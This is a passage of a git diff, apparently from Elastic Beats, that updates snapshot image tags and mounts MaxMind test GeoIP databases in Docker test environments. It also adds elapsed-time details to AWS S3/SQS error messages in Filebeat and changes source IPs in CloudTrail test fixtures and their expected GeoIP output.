Binary files /dev/null and b/testing/environments/GeoLite2-ASN.mmdb differ
diff --git a/testing/environments/GeoLite2-City.mmdb b/testing/environments/GeoLite2-City.mmdb
new file mode 100644
index 000000000000..88d5e702215f
Binary files /dev/null and b/testing/environments/GeoLite2-City.mmdb differ
diff --git a/testing/environments/GeoLite2-Country.mmdb b/testing/environments/GeoLite2-Country.mmdb
new file mode 100644
index 000000000000..b554a460d1fc
Binary files /dev/null and b/testing/environments/GeoLite2-Country.mmdb differ
diff --git a/testing/environments/snapshot-oss.yml b/testing/environments/snapshot-oss.yml
index 4c041852082b..38f0a2bc4356 100644
--- a/testing/environments/snapshot-oss.yml
+++ b/testing/environments/snapshot-oss.yml
@@ -3,7 +3,7 @@
 version: '2.3'
 services:
   elasticsearch:
-    image: docker.elastic.co/elasticsearch/elasticsearch:8.0.0-cf8e5c68-SNAPSHOT
+    image: docker.elastic.co/elasticsearch/elasticsearch:8.0.0-fa37006f-SNAPSHOT
     healthcheck:
       test: ["CMD-SHELL", "curl -s http://localhost:9200/_cat/health?h=status | grep -q green"]
       retries: 300
@@ -21,7 +21,7 @@ services:
     - "script.context.template.cache_max_size=2000"
 
   logstash:
-    image: docker.elastic.co/logstash/logstash-oss:8.0.0-cf8e5c68-SNAPSHOT
+    image: docker.elastic.co/logstash/logstash-oss:8.0.0-fa37006f-SNAPSHOT
     healthcheck:
       test: ["CMD", "curl", "-f", "http://localhost:9600/_node/stats"]
       retries: 600
@@ -31,7 +31,7 @@ services:
     - ./docker/logstash/pki:/etc/pki:ro
 
   kibana:
-    image: docker.elastic.co/kibana/kibana:8.0.0-cf8e5c68-SNAPSHOT
+    image: docker.elastic.co/kibana/kibana:8.0.0-fa37006f-SNAPSHOT
     healthcheck:
       test: ["CMD-SHELL", "curl -s http://localhost:5601/api/status?v8format=true | grep -q '\"overall\":{\"level\":\"available\"'"]
       retries: 600
diff --git a/testing/environments/snapshot.yml b/testing/environments/snapshot.yml
index a5d114d30f8d..87efda65f71b 100644
--- a/testing/environments/snapshot.yml
+++ b/testing/environments/snapshot.yml
@@ -3,7 +3,7 @@
 version: '2.3'
 services:
   elasticsearch:
-    image: docker.elastic.co/elasticsearch/elasticsearch:8.0.0-cf8e5c68-SNAPSHOT
+    image: docker.elastic.co/elasticsearch/elasticsearch:8.0.0-fa37006f-SNAPSHOT
     healthcheck:
       test: ["CMD-SHELL", "curl -s http://localhost:9200/_cat/health?h=status | grep -q green"]
       retries: 300
@@ -14,14 +14,17 @@ services:
     - "transport.host=127.0.0.1"
     - "http.host=0.0.0.0"
     - "xpack.security.enabled=false"
-    - "script.context.template.max_compilations_rate=unlimited"
-    - "script.context.ingest.cache_max_size=2000"
-    - "script.context.processor_conditional.cache_max_size=2000"
-    - "script.context.template.cache_max_size=2000"
+    # We want something as unlimited compilation rate, but 'unlimited' is not valid.
+    - "script.max_compilations_rate=100000/1m"
     - "action.destructive_requires_name=false"
     # Disable geoip updates to prevent golden file test failures when the database
     # changes and prevent race conditions between tests and database updates.
     - "ingest.geoip.downloader.enabled=false"
+    volumes:
+    # Test files from https://github.com/maxmind/MaxMind-DB/tree/2bf1713b3b5adcb022cf4bb77eb0689beaadcfef/test-data
+    - "./GeoLite2-ASN.mmdb:/usr/share/elasticsearch/config/ingest-geoip/GeoLite2-ASN.mmdb:ro"
+    - "./GeoLite2-City.mmdb:/usr/share/elasticsearch/config/ingest-geoip/GeoLite2-City.mmdb:ro"
+    - "./GeoLite2-Country.mmdb:/usr/share/elasticsearch/config/ingest-geoip/GeoLite2-Country.mmdb:ro"
 
   logstash:
     image: docker.elastic.co/logstash/logstash@sha256:e01cf165142edf8d67485115b938c94deeda66153e9516aa2ce69ee417c5fc33
@@ -34,7 +37,7 @@ services:
       - ./docker/logstash/pki:/etc/pki:ro
 
   kibana:
-    image: docker.elastic.co/kibana/kibana:8.0.0-cf8e5c68-SNAPSHOT
+    image: docker.elastic.co/kibana/kibana:8.0.0-fa37006f-SNAPSHOT
     healthcheck:
       test: ["CMD-SHELL", "curl -s http://localhost:5601/api/status?v8format=true | grep -q '\"overall\":{\"level\":\"available\"'"]
       retries: 600
diff --git a/x-pack/filebeat/input/awss3/s3_objects.go b/x-pack/filebeat/input/awss3/s3_objects.go
index 2839c31e2253..7fe6b193fa45 100644
--- a/x-pack/filebeat/input/awss3/s3_objects.go
+++ b/x-pack/filebeat/input/awss3/s3_objects.go
@@ -120,23 +120,22 @@ func (p *s3ObjectProcessor) ProcessS3Object() error {
 	}
 
 	// Metrics and Logging
-	{
-		p.log.Debug("Begin S3 object processing.")
-		p.metrics.s3ObjectsRequestedTotal.Inc()
-		p.metrics.s3ObjectsInflight.Inc()
-		start := time.Now()
-		defer func() {
-			elapsed := time.Since(start)
-			p.metrics.s3ObjectsInflight.Dec()
-			p.metrics.s3ObjectProcessingTime.Update(elapsed.Nanoseconds())
-			p.log.Debugw("End S3 object processing.", "elapsed_time_ns", elapsed)
-		}()
-	}
+	p.log.Debug("Begin S3 object processing.")
+	p.metrics.s3ObjectsRequestedTotal.Inc()
+	p.metrics.s3ObjectsInflight.Inc()
+	start := time.Now()
+	defer func() {
+		elapsed := time.Since(start)
+		p.metrics.s3ObjectsInflight.Dec()
+		p.metrics.s3ObjectProcessingTime.Update(elapsed.Nanoseconds())
+		p.log.Debugw("End S3 object processing.", "elapsed_time_ns", elapsed)
+	}()
 
 	// Request object (download).
 	contentType, meta, body, err := p.download()
 	if err != nil {
-		return errors.Wrap(err, "failed to get s3 object")
+		return errors.Wrapf(err, "failed to get s3 object (elasped_time_ns=%d)",
+			time.Since(start).Nanoseconds())
 	}
 	defer body.Close()
 	p.s3Metadata = meta
@@ -159,7 +158,8 @@ func (p *s3ObjectProcessor) ProcessS3Object() error {
 		err = p.readFile(reader)
 	}
 	if err != nil {
-		return err
+		return errors.Wrapf(err, "failed reading s3 object (elasped_time_ns=%d)",
+			time.Since(start).Nanoseconds())
 	}
 
 	return nil
diff --git a/x-pack/filebeat/input/awss3/sqs.go b/x-pack/filebeat/input/awss3/sqs.go
index 56f35e473ce4..1f13ec010cf7 100644
--- a/x-pack/filebeat/input/awss3/sqs.go
+++ b/x-pack/filebeat/input/awss3/sqs.go
@@ -88,7 +88,10 @@ func (r *sqsReader) Receive(ctx context.Context) error {
 				}()
 
 				if err := r.msgHandler.ProcessSQS(ctx, &msg); err != nil {
-					r.log.Warnw("Failed processing SQS message.", "error", err, "message_id", *msg.MessageId)
+					r.log.Warnw("Failed processing SQS message.",
+						"error", err,
+						"message_id", *msg.MessageId,
+						"elapsed_time_ns", time.Since(start))
 				}
 			}(msg, time.Now())
 		}
diff --git a/x-pack/filebeat/input/awss3/sqs_s3_event.go b/x-pack/filebeat/input/awss3/sqs_s3_event.go
index c906c74fa9e0..b6641a36c81c 100644
--- a/x-pack/filebeat/input/awss3/sqs_s3_event.go
+++ b/x-pack/filebeat/input/awss3/sqs_s3_event.go
@@ -265,7 +265,7 @@ func (p *sqsS3EventProcessor) processS3Events(ctx context.Context, log *logp.Log
 	defer acker.Wait()
 
 	var errs []error
-	for _, event := range s3Events {
+	for i, event := range s3Events {
 		s3Processor := p.s3ObjectHandler.Create(ctx, log, acker, event)
 		if s3Processor == nil {
 			continue
@@ -274,8 +274,8 @@ func (p *sqsS3EventProcessor) processS3Events(ctx context.Context, log *logp.Log
 		// Process S3 object (download, parse, create events).
 		if err := s3Processor.ProcessS3Object(); err != nil {
 			errs = append(errs, errors.Wrapf(err,
-				"failed processing S3 event for object key %q in bucket %q",
-				event.S3.Object.Key, event.S3.Bucket.Name))
+				"failed processing S3 event for object key %q in bucket %q (object record %d of %d in SQS notification)",
+				event.S3.Object.Key, event.S3.Bucket.Name, i+1, len(s3Events)))
 		}
 	}
 
diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log b/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log
index c2a4a5e884bb..90e496fc0ff2 100644
--- a/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log
+++ b/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log
@@ -1 +1 @@
-{"eventVersion":"1.05","userIdentity":{"type":"AssumedRole","principalId":"AROAIN5ATK5U7KEXAMPLE:JohnRole1","arn":"arn:aws:sts::111111111111:assumed-role/JohnDoe/JohnRole1","accountId":"111111111111","accessKeyId":"AKIAI44QH8DHBEXAMPLE","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2019-10-02T21:50:54Z"},"sessionIssuer":{"type":"Role","principalId":"AROAIN5ATK5U7KEXAMPLE","arn":"arn:aws:iam::111111111111:role/JohnRole1","accountId":"111111111111","userName":"JohnDoe"}}},"eventTime":"2019-10-02T22:12:29Z","eventSource":"sts.amazonaws.com","eventName":"AssumeRole","awsRegion":"us-east-2","sourceIPAddress":"123.145.67.89","userAgent":"aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 botocore/1.12.239","requestParameters":{"incomingTransitiveTags":{"Department":"Engineering"},"tags":[{"value":"johndoe@example.com","key":"Email"},{"value":"12345","key":"CostCenter"}],"roleArn":"arn:aws:iam::111111111111:role/JohnRole2","roleSessionName":"Role2WithTags","transitiveTagKeys":["Email","CostCenter"],"durationSeconds":3600},"responseElements":{"credentials":{"accessKeyId":"ASIAWHOJDLGPOEXAMPLE","expiration":"Oct 2, 2019 11:12:29 PM","sessionToken":"AgoJb3JpZ2luX2VjEB4aCXVzLXdlc3QtMSJHMEXAMPLETOKEN+//rJb8Lo30mFc5MlhFCEbubZvEj0wHB/mDMwIgSEe9gk/Zjr09tZV7F1HDTMhmEXAMPLETOKEN/iEJ/rkqngII9///////////ARABGgw0MjgzMDc4NjM5NjYiDLZjZFKwP4qxQG5sFCryASO4UPz5qE97wPPH1eLMvs7CgSDBSWfonmRTCfokm2FN1+hWUdQQH6adjbbrVLFL8c3jSsBhQ383AvxpwK5YRuDE1AI/+C+WKFZb701eiv9J5La2EXAMPLETOKEN/c7S5Iro1WUJ0q3Cxuo/8HUoSxVhQHM7zF7mWWLhXLEQ52ivL+F6q5dpXu4aTFedpMfnJa8JtkWwG9x1Axj0Ypy2ok8v5unpQGWych1vwdvj6ez1Dm8Xg1+qIzXILiEXAMPLETOKEN/vQGqu8H+nxp3kabcrtOvTFTvxX6vsc8OGwUfHhzAfYGEXAMPLETOKEN/L6v1yMM3B1OwFOrQBno1HEjf1oNI8RnQiMNFdUOtwYj7HUZIOCZmjfN8PPHq77N7GJl9lzvIZKQA0Owcjg+mc78zHCj8y0siY8C96paEXAMPLETOKEN/E3cpksxWdgs91HRzJWScjN2+r2LTGjYhyPqcmFzzo2mCE7mBNEXAMPLETOKEN/oJy+2o83YNW5tOiDmczgDzJZ4UKR84yGYOMfSnF4XcEJrDgAJ3OJFwmTcTQICAlSwLEXAMPLETOKEN"},"assumedRoleUser":{"assumedRoleId":"AROAIFR7WHDTSOYQYHFUE:Role2WithTags","arn":"arn:aws:sts::111111111111:assumed-role/test-role/Role2WithTags"}},"requestID":"b96b0e4e-e561-11e9-8b3f-7b396EXAMPLE","eventID":"1917948f-3042-46ec-98e2-62865EXAMPLE","resources":[{"ARN":"arn:aws:iam::111122223333:role/JohnRole2","accountId":"111111111111","type":"AWS::IAM::Role"}],"eventType":"AwsApiCall","recipientAccountId":"111111111111"}
+{"eventVersion":"1.05","userIdentity":{"type":"AssumedRole","principalId":"AROAIN5ATK5U7KEXAMPLE:JohnRole1","arn":"arn:aws:sts::111111111111:assumed-role/JohnDoe/JohnRole1","accountId":"111111111111","accessKeyId":"AKIAI44QH8DHBEXAMPLE","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2019-10-02T21:50:54Z"},"sessionIssuer":{"type":"Role","principalId":"AROAIN5ATK5U7KEXAMPLE","arn":"arn:aws:iam::111111111111:role/JohnRole1","accountId":"111111111111","userName":"JohnDoe"}}},"eventTime":"2019-10-02T22:12:29Z","eventSource":"sts.amazonaws.com","eventName":"AssumeRole","awsRegion":"us-east-2","sourceIPAddress":"81.2.69.144","userAgent":"aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 botocore/1.12.239","requestParameters":{"incomingTransitiveTags":{"Department":"Engineering"},"tags":[{"value":"johndoe@example.com","key":"Email"},{"value":"12345","key":"CostCenter"}],"roleArn":"arn:aws:iam::111111111111:role/JohnRole2","roleSessionName":"Role2WithTags","transitiveTagKeys":["Email","CostCenter"],"durationSeconds":3600},"responseElements":{"credentials":{"accessKeyId":"ASIAWHOJDLGPOEXAMPLE","expiration":"Oct 2, 2019 11:12:29 PM","sessionToken":"AgoJb3JpZ2luX2VjEB4aCXVzLXdlc3QtMSJHMEXAMPLETOKEN+//rJb8Lo30mFc5MlhFCEbubZvEj0wHB/mDMwIgSEe9gk/Zjr09tZV7F1HDTMhmEXAMPLETOKEN/iEJ/rkqngII9///////////ARABGgw0MjgzMDc4NjM5NjYiDLZjZFKwP4qxQG5sFCryASO4UPz5qE97wPPH1eLMvs7CgSDBSWfonmRTCfokm2FN1+hWUdQQH6adjbbrVLFL8c3jSsBhQ383AvxpwK5YRuDE1AI/+C+WKFZb701eiv9J5La2EXAMPLETOKEN/c7S5Iro1WUJ0q3Cxuo/8HUoSxVhQHM7zF7mWWLhXLEQ52ivL+F6q5dpXu4aTFedpMfnJa8JtkWwG9x1Axj0Ypy2ok8v5unpQGWych1vwdvj6ez1Dm8Xg1+qIzXILiEXAMPLETOKEN/vQGqu8H+nxp3kabcrtOvTFTvxX6vsc8OGwUfHhzAfYGEXAMPLETOKEN/L6v1yMM3B1OwFOrQBno1HEjf1oNI8RnQiMNFdUOtwYj7HUZIOCZmjfN8PPHq77N7GJl9lzvIZKQA0Owcjg+mc78zHCj8y0siY8C96paEXAMPLETOKEN/E3cpksxWdgs91HRzJWScjN2+r2LTGjYhyPqcmFzzo2mCE7mBNEXAMPLETOKEN/oJy+2o83YNW5tOiDmczgDzJZ4UKR84yGYOMfSnF4XcEJrDgAJ3OJFwmTcTQICAlSwLEXAMPLETOKEN"},"assumedRoleUser":{"assumedRoleId":"AROAIFR7WHDTSOYQYHFUE:Role2WithTags","arn":"arn:aws:sts::111111111111:assumed-role/test-role/Role2WithTags"}},"requestID":"b96b0e4e-e561-11e9-8b3f-7b396EXAMPLE","eventID":"1917948f-3042-46ec-98e2-62865EXAMPLE","resources":[{"ARN":"arn:aws:iam::111122223333:role/JohnRole2","accountId":"111111111111","type":"AWS::IAM::Role"}],"eventType":"AwsApiCall","recipientAccountId":"111111111111"}
diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log-expected.json
index 378b6f8b37f9..7e1ffad0eced 100644
--- a/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log-expected.json
+++ b/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log-expected.json
@@ -48,7 +48,7 @@
         "event.id": "1917948f-3042-46ec-98e2-62865EXAMPLE",
         "event.kind": "event",
         "event.module": "aws",
-        "event.original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AROAIN5ATK5U7KEXAMPLE:JohnRole1\",\"arn\":\"arn:aws:sts::111111111111:assumed-role/JohnDoe/JohnRole1\",\"accountId\":\"111111111111\",\"accessKeyId\":\"AKIAI44QH8DHBEXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2019-10-02T21:50:54Z\"},\"sessionIssuer\":{\"type\":\"Role\",\"principalId\":\"AROAIN5ATK5U7KEXAMPLE\",\"arn\":\"arn:aws:iam::111111111111:role/JohnRole1\",\"accountId\":\"111111111111\",\"userName\":\"JohnDoe\"}}},\"eventTime\":\"2019-10-02T22:12:29Z\",\"eventSource\":\"sts.amazonaws.com\",\"eventName\":\"AssumeRole\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"123.145.67.89\",\"userAgent\":\"aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 botocore/1.12.239\",\"requestParameters\":{\"incomingTransitiveTags\":{\"Department\":\"Engineering\"},\"tags\":[{\"value\":\"johndoe@example.com\",\"key\":\"Email\"},{\"value\":\"12345\",\"key\":\"CostCenter\"}],\"roleArn\":\"arn:aws:iam::111111111111:role/JohnRole2\",\"roleSessionName\":\"Role2WithTags\",\"transitiveTagKeys\":[\"Email\",\"CostCenter\"],\"durationSeconds\":3600},\"responseElements\":{\"credentials\":{\"accessKeyId\":\"ASIAWHOJDLGPOEXAMPLE\",\"expiration\":\"Oct 2, 2019 11:12:29 PM\",\"sessionToken\":\"AgoJb3JpZ2luX2VjEB4aCXVzLXdlc3QtMSJHMEXAMPLETOKEN+//rJb8Lo30mFc5MlhFCEbubZvEj0wHB/mDMwIgSEe9gk/Zjr09tZV7F1HDTMhmEXAMPLETOKEN/iEJ/rkqngII9///////////ARABGgw0MjgzMDc4NjM5NjYiDLZjZFKwP4qxQG5sFCryASO4UPz5qE97wPPH1eLMvs7CgSDBSWfonmRTCfokm2FN1+hWUdQQH6adjbbrVLFL8c3jSsBhQ383AvxpwK5YRuDE1AI/+C+WKFZb701eiv9J5La2EXAMPLETOKEN/c7S5Iro1WUJ0q3Cxuo/8HUoSxVhQHM7zF7mWWLhXLEQ52ivL+F6q5dpXu4aTFedpMfnJa8JtkWwG9x1Axj0Ypy2ok8v5unpQGWych1vwdvj6ez1Dm8Xg1+qIzXILiEXAMPLETOKEN/vQGqu8H+nxp3kabcrtOvTFTvxX6vsc8OGwUfHhzAfYGEXAMPLETOKEN/L6v1yMM3B1OwFOrQBno1HEjf1oNI8RnQiMNFdUOtwYj7HUZIOCZmjfN8PPHq77N7GJl9lzvIZKQA0Owcjg+mc78zHCj8y0siY8C96paEXAMPLETOKEN/E3cpksxWdgs91HRzJWScjN2+r2LTGjYhyPqcmFzzo2mCE7mBNEXAMPLETOKEN/oJy+2o83YNW5tOiDmczgDzJZ4UKR84yGYOMfSnF4XcEJrDgAJ3OJFwmTcTQICAlSwLEXAMPLETOKEN\"},\"assumedRoleUser\":{\"assumedRoleId\":\"AROAIFR7WHDTSOYQYHFUE:Role2WithTags\",\"arn\":\"arn:aws:sts::111111111111:assumed-role/test-role/Role2WithTags\"}},\"requestID\":\"b96b0e4e-e561-11e9-8b3f-7b396EXAMPLE\",\"eventID\":\"1917948f-3042-46ec-98e2-62865EXAMPLE\",\"resources\":[{\"ARN\":\"arn:aws:iam::111122223333:role/JohnRole2\",\"accountId\":\"111111111111\",\"type\":\"AWS::IAM::Role\"}],\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"111111111111\"}",
+        "event.original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AROAIN5ATK5U7KEXAMPLE:JohnRole1\",\"arn\":\"arn:aws:sts::111111111111:assumed-role/JohnDoe/JohnRole1\",\"accountId\":\"111111111111\",\"accessKeyId\":\"AKIAI44QH8DHBEXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2019-10-02T21:50:54Z\"},\"sessionIssuer\":{\"type\":\"Role\",\"principalId\":\"AROAIN5ATK5U7KEXAMPLE\",\"arn\":\"arn:aws:iam::111111111111:role/JohnRole1\",\"accountId\":\"111111111111\",\"userName\":\"JohnDoe\"}}},\"eventTime\":\"2019-10-02T22:12:29Z\",\"eventSource\":\"sts.amazonaws.com\",\"eventName\":\"AssumeRole\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"81.2.69.144\",\"userAgent\":\"aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 botocore/1.12.239\",\"requestParameters\":{\"incomingTransitiveTags\":{\"Department\":\"Engineering\"},\"tags\":[{\"value\":\"johndoe@example.com\",\"key\":\"Email\"},{\"value\":\"12345\",\"key\":\"CostCenter\"}],\"roleArn\":\"arn:aws:iam::111111111111:role/JohnRole2\",\"roleSessionName\":\"Role2WithTags\",\"transitiveTagKeys\":[\"Email\",\"CostCenter\"],\"durationSeconds\":3600},\"responseElements\":{\"credentials\":{\"accessKeyId\":\"ASIAWHOJDLGPOEXAMPLE\",\"expiration\":\"Oct 2, 2019 11:12:29 PM\",\"sessionToken\":\"AgoJb3JpZ2luX2VjEB4aCXVzLXdlc3QtMSJHMEXAMPLETOKEN+//rJb8Lo30mFc5MlhFCEbubZvEj0wHB/mDMwIgSEe9gk/Zjr09tZV7F1HDTMhmEXAMPLETOKEN/iEJ/rkqngII9///////////ARABGgw0MjgzMDc4NjM5NjYiDLZjZFKwP4qxQG5sFCryASO4UPz5qE97wPPH1eLMvs7CgSDBSWfonmRTCfokm2FN1+hWUdQQH6adjbbrVLFL8c3jSsBhQ383AvxpwK5YRuDE1AI/+C+WKFZb701eiv9J5La2EXAMPLETOKEN/c7S5Iro1WUJ0q3Cxuo/8HUoSxVhQHM7zF7mWWLhXLEQ52ivL+F6q5dpXu4aTFedpMfnJa8JtkWwG9x1Axj0Ypy2ok8v5unpQGWych1vwdvj6ez1Dm8Xg1+qIzXILiEXAMPLETOKEN/vQGqu8H+nxp3kabcrtOvTFTvxX6vsc8OGwUfHhzAfYGEXAMPLETOKEN/L6v1yMM3B1OwFOrQBno1HEjf1oNI8RnQiMNFdUOtwYj7HUZIOCZmjfN8PPHq77N7GJl9lzvIZKQA0Owcjg+mc78zHCj8y0siY8C96paEXAMPLETOKEN/E3cpksxWdgs91HRzJWScjN2+r2LTGjYhyPqcmFzzo2mCE7mBNEXAMPLETOKEN/oJy+2o83YNW5tOiDmczgDzJZ4UKR84yGYOMfSnF4XcEJrDgAJ3OJFwmTcTQICAlSwLEXAMPLETOKEN\"},\"assumedRoleUser\":{\"assumedRoleId\":\"AROAIFR7WHDTSOYQYHFUE:Role2WithTags\",\"arn\":\"arn:aws:sts::111111111111:assumed-role/test-role/Role2WithTags\"}},\"requestID\":\"b96b0e4e-e561-11e9-8b3f-7b396EXAMPLE\",\"eventID\":\"1917948f-3042-46ec-98e2-62865EXAMPLE\",\"resources\":[{\"ARN\":\"arn:aws:iam::111122223333:role/JohnRole2\",\"accountId\":\"111111111111\",\"type\":\"AWS::IAM::Role\"}],\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"111111111111\"}",
         "event.outcome": "success",
         "event.provider": "sts.amazonaws.com",
         "event.type": [
@@ -58,17 +58,16 @@
         "input.type": "log",
         "log.offset": 0,
         "service.type": "aws",
-        "source.address": "123.145.67.89",
-        "source.as.number": 4837,
-        "source.as.organization.name": "CHINA UNICOM China169 Backbone",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 29.5569,
-        "source.geo.location.lon": 106.5531,
-        "source.geo.region_iso_code": "CN-CQ",
-        "source.geo.region_name": "Chongqing",
-        "source.ip": "123.145.67.89",
+        "source.address": "81.2.69.144",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.144",
         "tags": [
             "forwarded"
         ],
diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log b/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log
index 5b9c40ad40c4..520d80598ceb 100644
--- a/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log
+++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log
@@ -1 +1 @@
-{"eventVersion":"1.0","userIdentity":{"type":"IAMUser","principalId":"EX_PRINCIPAL_ID","arn":"arn:aws:iam::123456789012:user/Alice","accountId":"123456789012","accessKeyId":"EXAMPLE_KEY_ID","userName":"Alice","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2014-03-06T15:15:06Z"}}},"eventTime":"2014-03-06T17:10:34Z","eventSource":"ec2.amazonaws.com","eventName":"CreateKeyPair","awsRegion":"us-east-2","sourceIPAddress":"72.21.198.64","userAgent":"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx","requestParameters":{"keyName":"mykeypair"},"responseElements":{"keyName":"mykeypair","keyFingerprint":"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21","keyMaterial":"<sensitiveDataRemoved>"}}
+{"eventVersion":"1.0","userIdentity":{"type":"IAMUser","principalId":"EX_PRINCIPAL_ID","arn":"arn:aws:iam::123456789012:user/Alice","accountId":"123456789012","accessKeyId":"EXAMPLE_KEY_ID","userName":"Alice","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2014-03-06T15:15:06Z"}}},"eventTime":"2014-03-06T17:10:34Z","eventSource":"ec2.amazonaws.com","eventName":"CreateKeyPair","awsRegion":"us-east-2","sourceIPAddress":"67.43.156.15","userAgent":"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx","requestParameters":{"keyName":"mykeypair"},"responseElements":{"keyName":"mykeypair","keyFingerprint":"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21","keyMaterial":"<sensitiveDataRemoved>"}}
diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json
index f2ce56d3683e..97a6f718cc12 100644
--- a/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json
+++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json
@@ -22,7 +22,7 @@
         "event.dataset": "aws.cloudtrail",
         "event.kind": "event",
         "event.module": "aws",
-        "event.original": "{\"eventVersion\":\"1.0\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2014-03-06T15:15:06Z\"}}},\"eventTime\":\"2014-03-06T17:10:34Z\",\"eventSource\":\"ec2.amazonaws.com\",\"eventName\":\"CreateKeyPair\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"72.21.198.64\",\"userAgent\":\"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx\",\"requestParameters\":{\"keyName\":\"mykeypair\"},\"responseElements\":{\"keyName\":\"mykeypair\",\"keyFingerprint\":\"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21\",\"keyMaterial\":\"<sensitiveDataRemoved>\"}}",
+        "event.original": "{\"eventVersion\":\"1.0\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2014-03-06T15:15:06Z\"}}},\"eventTime\":\"2014-03-06T17:10:34Z\",\"eventSource\":\"ec2.amazonaws.com\",\"eventName\":\"CreateKeyPair\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"67.43.156.15\",\"userAgent\":\"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx\",\"requestParameters\":{\"keyName\":\"mykeypair\"},\"responseElements\":{\"keyName\":\"mykeypair\",\"keyFingerprint\":\"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21\",\"keyMaterial\":\"<sensitiveDataRemoved>\"}}",
         "event.outcome": "success",
         "event.provider": "ec2.amazonaws.com",
         "event.type": [
@@ -36,18 +36,14 @@
             "Alice"
         ],
         "service.type": "aws",
-        "source.address": "72.21.198.64",
-        "source.as.number": 16509,
-        "source.as.organization.name": "Amazon.com, Inc.",
-        "source.geo.city_name": "Ashburn",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 39.0481,
-        "source.geo.location.lon": -77.4728,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "72.21.198.64",
+        "source.address": "67.43.156.15",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.15",
         "tags": [
             "forwarded"
         ],
diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log b/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log
index f8a9bc9e2a34..acb1c89f110a 100644
--- a/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log
+++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log
@@ -1,2 +1,2 @@
